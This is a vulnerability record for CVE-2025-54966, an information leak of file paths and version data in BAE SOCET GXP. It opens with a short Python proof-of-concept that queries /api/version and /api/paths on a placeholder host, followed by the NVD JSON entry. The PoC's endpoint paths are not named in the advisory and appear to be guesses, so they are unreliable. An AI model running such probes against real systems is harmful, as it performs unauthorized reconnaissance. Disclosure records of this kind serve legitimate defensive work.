CVE-2025-54966

# CVE-2025-54966 PoC - BAE SOCET GXP Information Disclosure import requests target = "http://target.com" # 获取版本信息 response = requests.get(f"{target}/api/version") print(f"Version: {response.text}") # 获取文件路径 response = requests.get(f"{target}/api/paths") print(f"Paths: {response.text}")

{"cve": {"id": "CVE-2025-54966", "sourceIdentifier": "[email protected]", "published": "2025-10-23T20:15:39.983", "lastModified": "2025-10-28T16:19:20.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.2. Some endpoints on the SOCET GXP Job Status Service may return sensitive information in certain situations, including local file paths and SOCET GXP version information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.2", "matchCriteriaId": "6BF9E6F9-E4EA-4880-9B20-2CEDD7D118C8"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54966", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}